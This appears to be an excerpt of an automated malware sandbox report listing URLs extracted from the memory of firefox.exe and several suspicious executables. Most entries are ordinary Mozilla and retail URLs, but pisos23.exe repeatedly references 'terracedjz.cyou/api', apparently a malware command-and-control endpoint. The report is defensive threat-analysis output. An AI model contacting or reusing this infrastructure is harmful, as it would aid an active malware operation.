Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comcreateContentPrincipalFromOriginhttps://support.mozilla.orghttps://tr
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001D.00000002.3328453437.000001B635B57000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3444672423.000001B63763A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001D.00000002.3290075534.000001B63362D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3141800421.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B63643D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B63643D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:
Source: firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001D.00000002.3444672423.000001B6376AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DBDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpchecking
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001D.00000002.3470877019.000001B6394A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsresource://devtools/client/
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesresource://devtools/client/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 7fb3e2a1d2.exe, 0000000E.00000003.3449546235.0000000029B9F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: pisos23.exe, 0000000A.00000002.3121196586.0000000003429000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3098052157.0000000003427000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3094450003.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.c
Source: pisos23.exe, 0000000A.00000003.2980648761.0000000003499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/
Source: pisos23.exe, 0000000A.00000003.3098052157.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3121196586.000000000343C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/.$A
Source: pisos23.exe, 0000000A.00000003.3025863209.00000000034AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/=C:
Source: pisos23.exe, 0000000A.00000003.3025863209.00000000034AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/Datz
Source: pisos23.exe, 0000000A.00000003.3098052157.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3094450003.000000000340D000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3121196586.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3113659391.000000000340D000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3121196586.0000000003470000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3098052157.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/api
Source: pisos23.exe, 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2988947473.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961051279.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3018208886.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2980997521.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2943421605.0000000003498000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2988852728.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2990500628.00000000034AC000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2959907784.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2988528325.000000000349B000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2980648761.0000000003499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/apiUmZz
Source: pisos23.exe, 0000000A.00000003.3025863209.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2979610284.0000000003499000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/apiUmZzh
Source: pisos23.exe, 0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/apied
Source: pisos23.exe, 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/apiv
Source: pisos23.exe, 0000000A.00000003.3094450003.000000000340D000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3113659391.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/api~
Source: pisos23.exe, 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/gji
Source: pisos23.exe, 0000000A.00000003.3025863209.00000000034AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/ind
Source: pisos23.exe, 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/m
Source: pisos23.exe, 0000000A.00000003.3098052157.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3121196586.000000000343C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou/pi
Source: pisos23.exe, 0000000A.00000003.3026380844.0000000003499000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2979610284.0000000003499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://terracedjz.cyou:443/api
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3270733549.000001B6333A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.comPu
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/P
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3152608319.000001B63DD38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001D.00000003.3129065732.000001B63DA5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3368455857.000001B6363C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3248030030.000001B6316B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/resource:///modules/UrlbarProvidersManager.sys.mj
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
